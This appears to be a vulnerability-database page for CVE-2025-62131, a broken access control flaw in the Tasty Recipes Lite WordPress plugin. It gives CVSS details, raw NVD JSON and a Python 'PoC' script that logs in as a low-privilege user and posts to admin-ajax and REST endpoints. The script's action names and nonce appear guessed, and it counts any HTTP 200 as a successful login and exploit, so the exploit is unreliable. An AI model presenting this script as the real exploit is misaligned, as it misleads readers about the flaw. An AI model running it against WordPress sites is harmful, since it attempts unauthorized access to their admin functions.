Security Vulnerability Report
中文
CVE-2025-62131 CVSS 4.3 MEDIUM

CVE-2025-62131

Published: 2025-12-31 16:15:46
Last Modified: 2026-04-23 15:34:36

Description

Missing Authorization vulnerability in Strategy11 Team Tasty Recipes Lite tasty-recipes-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tasty Recipes Lite: from n/a through <= 1.1.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tasty Recipes Lite <= 1.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62131 PoC - Tasty Recipes Lite Broken Access Control # Requires a low-privilege WordPress account (subscriber role) import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" def get_auth_cookie(): """Authenticate and get WordPress session cookie""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' in str(session.cookies) or response.status_code == 200: return session.cookies return None def exploit_broken_access_control(cookies): """Exploit the missing authorization vulnerability""" # Target the vulnerable endpoint - adjust based on actual findings vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/tasty-recipes/v1/" ] for endpoint in vulnerable_endpoints: # Example: Attempt to access admin-only functionality exploit_data = { 'action': 'tasty_recipes_admin_action', 'sub_action': 'export_recipes', 'nonce': 'dummy' # May not be properly validated } response = requests.post(endpoint, data=exploit_data, cookies=cookies) if response.status_code == 200: print(f"[+] Successfully accessed: {endpoint}") print(f"Response: {response.text[:500]}") return True print("[-] Exploitation failed - endpoint may require different payload") return False if __name__ == "__main__": print("[*] CVE-2025-62131 Exploitation Test") print("[*] Target: Tasty Recipes Lite <= 1.1.5") cookies = get_auth_cookie() if cookies: print("[+] Authentication successful") exploit_broken_access_control(cookies) else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62131", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:45.603", "lastModified": "2026-04-23T15:34:35.917", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Strategy11 Team Tasty Recipes Lite tasty-recipes-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tasty Recipes Lite: from n/a through <= 1.1.5."}, {"lang": "es", "value": "Vulnerabilidad de Autorización faltante en Strategy11 Team Tasty Recipes Lite permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Tasty Recipes Lite: desde n/a hasta 1.1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tasty-recipes-lite/vulnerability/wordpress-tasty-recipes-lite-plugin-1-1-5-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}